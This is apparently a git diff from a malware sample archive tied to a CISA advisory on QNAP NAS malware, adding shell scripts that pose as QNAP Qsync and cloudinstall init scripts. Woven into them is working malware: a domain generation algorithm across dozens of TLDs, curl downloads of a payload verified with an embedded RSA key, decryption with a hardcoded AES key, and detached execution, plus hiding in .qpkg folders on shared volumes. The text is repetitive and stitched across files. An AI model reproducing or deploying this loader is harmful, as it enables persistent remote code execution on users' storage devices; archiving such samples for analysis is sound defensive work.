openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
|
||||
cd "${bdir}/.qpkg/.config" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
{ /share/MD0_DATA/NOPE; exit 0; }
|
||||
fi
|
||||
fi
|
511
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/62426146b8fcaeaf6abb24d42543c6374b5f51e06c32206ccb9042350b832ea8
Normal file
511
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/62426146b8fcaeaf6abb24d42543c6374b5f51e06c32206ccb9042350b832ea8
Normal file
@ -0,0 +1,511 @@
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJog4rwwSz1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
